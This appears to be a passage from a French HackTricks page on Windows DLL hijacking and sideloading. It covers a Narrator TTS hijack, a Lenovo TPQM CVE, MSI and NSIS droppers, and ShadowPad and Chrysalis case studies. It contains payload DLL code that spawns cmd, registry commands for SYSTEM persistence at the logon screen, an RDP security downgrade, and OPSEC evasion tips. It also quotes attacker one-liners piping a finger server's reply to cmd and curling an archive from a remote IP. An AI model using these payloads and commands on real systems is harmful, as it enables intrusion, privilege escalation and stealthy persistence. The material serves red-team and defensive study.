#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## Étude de cas : Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)

Windows Narrator.exe recherche encore, au démarrage, une DLL de localisation prévisible et spécifique à la langue, qui peut être hijacked pour arbitrary code execution and persistence.

Faits clés
- Chemin sondé (versions actuelles) : `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- Chemin hérité (versions plus anciennes) : `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- Si une DLL contrôlée par l'attaquant et inscriptible existe au chemin OneCore, elle est chargée et `DllMain(DLL_PROCESS_ATTACH)` s'exécute. Aucune exportation n'est requise.

Découverte avec Procmon
- Filtre : `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Démarrez Narrator et observez la tentative de chargement du chemin ci‑dessus.

DLL minimale
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC silence

• A naive hijack will speak/highlight UI. To stay quiet, on attach enumerate Narrator threads, open the main thread (OpenThread(THREAD_SUSPEND_RESUME)) and SuspendThread it; continue in your own thread. See PoC for full code.

Déclenchement et persistance via la configuration Accessibility

• User context (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Avec ce qui précède, démarrer Narrator charge la DLL plantée. Sur le bureau sécurisé (écran de connexion), appuyez sur CTRL+WIN+ENTER pour démarrer Narrator ; votre DLL s’exécute en tant que SYSTEM sur le bureau sécurisé.

Exécution SYSTEM déclenchée par RDP (lateral movement)

• Allow classic RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• RDP to the host, at the logon screen press CTRL+WIN+ENTER to launch Narrator; your DLL executes as SYSTEM on the secure desktop.
• Execution stops when the RDP session closes—inject/migrate promptly.

Bring Your Own Accessibility (BYOA)

• You can clone a built-in Accessibility Tool (AT) registry entry (e.g., CursorIndicator), edit it to point to an arbitrary binary/DLL, import it, then set configuration to that AT name. This proxies arbitrary execution under the Accessibility framework.

Remarques

• Writing under %windir%\System32 and changing HKLM values requires admin rights.
• All payload logic can live in DLL_PROCESS_ATTACH; no exports are needed.

Étude de cas: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

This case demonstrates Phantom DLL Hijacking in Lenovo’s TrackPoint Quick Menu (TPQMAssistant.exe), tracked as CVE-2025-1729.

Détails de la vulnérabilité

• Composant: TPQMAssistant.exe situé dans C:\ProgramData\Lenovo\TPQM\Assistant\.
• Tâche planifiée: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask s’exécute quotidiennement à 09:30 sous le contexte de l’utilisateur connecté.
• Permissions du répertoire: inscriptible par CREATOR OWNER, permettant aux utilisateurs locaux de déposer des fichiers arbitraires.
• Comportement de recherche des DLL: tente de charger hostfxr.dll depuis son répertoire de travail en premier et logue “NAME NOT FOUND” si absent, indiquant une priorité de recherche dans le répertoire local.

Implémentation de l’exploit

Un attaquant peut placer un stub malveillant hostfxr.dll dans le même répertoire, exploitant la DLL manquante pour obtenir l’exécution de code dans le contexte de l’utilisateur :

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Flux d’attaque

1. En tant qu’utilisateur standard, déposer hostfxr.dll dans C:\ProgramData\Lenovo\TPQM\Assistant\.
2. Attendre que la tâche planifiée s’exécute à 9:30 sous le contexte de l’utilisateur courant.
3. Si un administrateur est connecté lorsque la tâche s’exécute, la DLL malveillante s’exécute dans la session de l’administrateur avec une intégrité moyenne.
4. Enchaîner des techniques standard de contournement de l’UAC pour élever l’intégrité moyenne aux privilèges SYSTEM.

Étude de cas: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

Les acteurs malveillants associent souvent MSI-based droppers avec DLL side-loading pour exécuter des payloads sous un processus signé et de confiance.

Aperçu de la chaîne

• L’utilisateur télécharge le MSI. Une CustomAction s’exécute silencieusement pendant l’installation GUI (par ex., LaunchApplication ou une action VBScript), reconstituant l’étape suivante à partir de ressources intégrées.
• Le dropper écrit un EXE légitime signé et une DLL malveillante dans le même répertoire (exemple : Avast-signed wsc_proxy.exe + attacker-controlled wsc.dll).
• Lorsque l’EXE signé est lancé, Windows DLL search order charge wsc.dll depuis le répertoire de travail en premier, exécutant le code de l’attaquant sous un parent signé (ATT&CK T1574.001).

MSI analysis (what to look for)

• CustomAction table:
• Recherchez des entrées qui lancent des exécutables ou du VBScript. Exemple de motif suspect : LaunchApplication exécutant un fichier intégré en arrière-plan.
• Dans Orca (Microsoft Orca.exe), inspectez les tables CustomAction, InstallExecuteSequence et Binary.
• Embedded/split payloads in the MSI CAB:
• Extraction administrative: msiexec /a package.msi /qb TARGETDIR=C:\out
• Ou utiliser lessmsi: lessmsi x package.msi C:\out
• Recherchez plusieurs petits fragments qui sont concaténés et décryptés par une VBScript CustomAction. Flux commun :

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

Sideloading pratique avec wsc_proxy.exe

• Placez ces deux fichiers dans le même dossier :
• wsc_proxy.exe: hôte signé légitime (Avast). Le processus tente de charger wsc.dll par son nom depuis son répertoire.
• wsc.dll: DLL d’attaquant. Si aucun export spécifique n’est requis, DllMain peut suffire ; sinon, construisez une proxy DLL et redirigez les exports requis vers la bibliothèque légitime tout en exécutant le payload dans DllMain.
• Créez un payload DLL minimal :

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• Pour les exigences d’exportation, utilisez un framework de proxy (e.g., DLLirant/Spartacus) pour générer un forwarding DLL qui exécute aussi votre payload.

• Cette technique repose sur la résolution du nom DLL par le binaire hôte. Si l’hôte utilise des chemins absolus ou des drapeaux de chargement sûrs (e.g., LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories), le hijack peut échouer.

• KnownDLLs, SxS, et les forwarded exports peuvent influencer la priorité et doivent être pris en compte lors du choix du binaire hôte et de l’ensemble des exports.

Triades signées + payloads chiffrés (étude de cas ShadowPad)

Check Point a décrit comment Ink Dragon déploie ShadowPad en utilisant une triade de trois fichiers pour se fondre dans des logiciels légitimes tout en gardant le payload principal chiffré sur le disque :

1. Signed host EXE – des fournisseurs comme AMD, Realtek, ou NVIDIA sont abusés (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe). Les attaquants renomment l’exécutable pour qu’il ressemble à un binaire Windows (par exemple conhost.exe), mais la signature Authenticode reste valide.
2. Malicious loader DLL – déposé à côté de l’EXE avec un nom attendu (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll). La DLL est généralement un binaire MFC obfusqué avec le framework ScatterBrain ; sa seule tâche est de localiser le blob chiffré, le déchiffrer, et mapper ShadowPad de manière réflexive.
3. Encrypted payload blob – souvent stocké sous forme de <name>.tmp dans le même répertoire. Après avoir mappé en mémoire le payload déchiffré, le loader supprime le fichier TMP pour détruire les preuves forensiques.

Remarques tradecraft :

• Renommer le EXE signé (tout en gardant le OriginalFileName d’origine dans l’en-tête PE) lui permet de se faire passer pour un binaire Windows tout en conservant la signature du fournisseur ; reproduisez donc la pratique d’Ink Dragon qui dépose des binaires ressemblant à conhost.exe alors qu’il s’agit d’utilitaires AMD/NVIDIA.
• Comme l’exécutable reste trusted, la plupart des contrôles d’allowlisting nécessitent uniquement que votre DLL malveillante soit placée à côté. Concentrez-vous sur la personnalisation du loader DLL ; le parent signé peut généralement s’exécuter sans modification.
• Le déchiffreur de ShadowPad attend que le blob TMP soit placé à côté du loader et soit writable afin de pouvoir zéroter le fichier après le mapping. Gardez le répertoire writable jusqu’au chargement du payload ; une fois en mémoire, le fichier TMP peut être supprimé en toute sécurité pour l’OPSEC.

LOLBAS stager + staged archive sideloading chain (finger → tar/curl → WMI)

Les opérateurs associent DLL sideloading avec LOLBAS de sorte que le seul artefact personnalisé sur le disque soit la DLL malveillante à côté de l’EXE trusted :

• Remote command loader (Finger): Un PowerShell caché lance cmd.exe /c, récupère des commandes depuis un serveur Finger et les pipe vers cmd :

powershell.exe Start-Process cmd -ArgumentList '/c finger Galo@91.193.19.108 | cmd' -WindowStyle Hidden

• finger user@host récupère du texte via TCP/79 ; | cmd exécute la réponse du serveur, permettant aux opérateurs de faire tourner le serveur de second stage côté serveur.

• Built-in download/extract: Télécharger une archive avec une extension bénigne, la décompresser, et placer le target de sideload ainsi que la DLL dans un dossier %LocalAppData% aléatoire :

$base = "$Env:LocalAppData"; $dir = Join-Path $base (Get-Random); curl -s -L -o "$dir.pdf" 79.141.172.212/tcp; mkdir "$dir"; tar -xf "$dir.pdf" -C "$dir"; $exe = "$dir\intelbq.exe"

• curl -s -L masque la progression et suit les redirections ; tar -xf utilise le tar intégré de Windows.

• WMI/CIM launch: Démarrer l’EXE via WMI afin que la télémétrie indique un processus créé par CIM pendant qu’il charge la DLL colocée :

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = "`"$exe`""}

• Fonctionne avec des binaires qui privilégient les DLL locales (e.g., intelbq.exe, nearby_share.exe) ; le payload (e.g., Remcos) s’exécute sous le nom trusted.

• Hunting: Alerter sur forfiles quand /p, /m, et /c apparaissent ensemble ; peu courant en dehors des scripts d’administration.

Étude de cas : NSIS dropper + Bitdefender Submission Wizard sideload (Chrysalis)

Une intrusion récente de Lotus Blossom a abusé d’une chaîne de mise à jour trusted pour livrer un dropper empaqueté NSIS qui a préparé un DLL sideload plus des payloads entièrement en mémoire.

Flux tradecraft

• update.exe (NSIS) crée %AppData%\Bluetooth, le marque HIDDEN, dépose un Bitdefender Submission Wizard renommé BluetoothService.exe, une log.dll malveillante, et un blob chiffré BluetoothService, puis lance l’EXE.
• L’EXE hôte importe log.dll et appelle LogInit/LogWrite. LogInit charge le blob via mmap ; LogWrite le déchiffre avec un flux personnalisé basé sur LCG (constantes 0x19660D / 0x3C6EF35F, matériau de clé dérivé d’un hash préalable), écrase le buffer avec du shellcode en clair, libère les temporaires et saute vers celui-ci.
• Pour éviter un IAT, le loader résout les APIs en hachant les noms d’exports en utilisant FNV-1a basis 0x811C9DC5 + prime 0x1000193, puis en appliquant une avalanche de type Murmur (0x85EBCA6B) et en comparant aux hashes cibles salés.

Shellcode principal (Chrysalis)

• Déchiffre un module principal de type PE en répétant add/XOR/sub avec la clé gQ2JR&9; sur cinq passes, puis charge dynamiquement Kernel32.dll → GetProcAddress pour terminer la résolution des imports.
• Reconstruit les chaînes de noms de DLL à l’exécution via des transformations bit-rotate/XOR par caractère, puis charge oleaut32, advapi32, shlwapi, user32, wininet, ole32, shell32.
• Utilise un second resolver qui parcourt la PEB → InMemoryOrderModuleList, analyse chaque table d’exports en blocs de 4 octets avec un mélange de type Murmur, et ne recourt à GetProcAddress que si le hash n’est pas trouvé.

Configuration embarquée & C2

• La config se trouve à l’intérieur du fichier BluetoothService déposé à offset 0x30808 (taille 0x980) et est décryptée RC4 avec la clé qwhvb^435h&*7, révélant l’URL C2 et le User-Agent.
• Les beacons construisent un profil d’hôte délimité par des points, préfixent la balise 4Q, puis encryptent RC4 avec la clé vAuig34%^325hGV avant HttpSendRequestA via HTTPS. Les réponses sont décryptées RC4 et dispatchées par un switch de tags (4T shell, 4V process exec, 4W/4X file write, 4Y read/exfil, 4\\ uninstall, 4 drive/file enum + chunked transfer cases).
• Le mode d’exécution est conditionné par les args CLI : pas d’args = installer la persistence (service/Run key) pointant vers -i ; -i relance le binaire avec -k ; -k saute l’installation et exécute le payload.

Loader alternatif observé

• La même intrusion a déposé Tiny C Compiler et exécuté svchost.exe -nostdlib -run conf.c depuis C:\ProgramData\USOShared\, avec libtcc.dll à côté. Le source C fourni par l’attaquant intégrait du shellcode, a été compilé et exécuté en mémoire sans toucher le disque avec un PE. Reproduire avec :

C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c

• Cette étape TCC-based compile-and-run a importé Wininet.dll à l’exécution et a récupéré un second-stage shellcode depuis une URL codée en dur, donnant un loader flexible qui se fait passer pour un compiler run.

Références

• Red Canary – Intelligence Insights: January 2026
• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
• Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
• 0xdf – HTB Bruno ZipSlip → DLL hijack chain

Tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

• Vérifiez les plans d’abonnement !
• Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
• Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.